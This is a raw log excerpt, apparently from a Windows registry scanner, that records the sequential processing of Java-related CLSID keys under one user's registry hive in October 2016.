[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.215] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.216] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.217] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0006-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0007-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.218] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0009-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0010-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0011-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0013-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.219] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0014-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0015-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0017-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0019-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.220] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0020-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0022-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0023-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0024-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.221] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0026-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0027-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0028-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0029-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.222] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0031-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0032-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0034-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0035-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.223] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0036-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0037-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0038-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0039-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0040-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.224] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0042-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0043-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-FFFF-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0000-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.225] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0002-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0003-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBA}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBB}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBC}]
[2016.10.18 21:01:31.226] - INFO: Processing clsid [\Registry\User\S-1-5-21-3902107189-2783423906-2191778952-1000\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}]
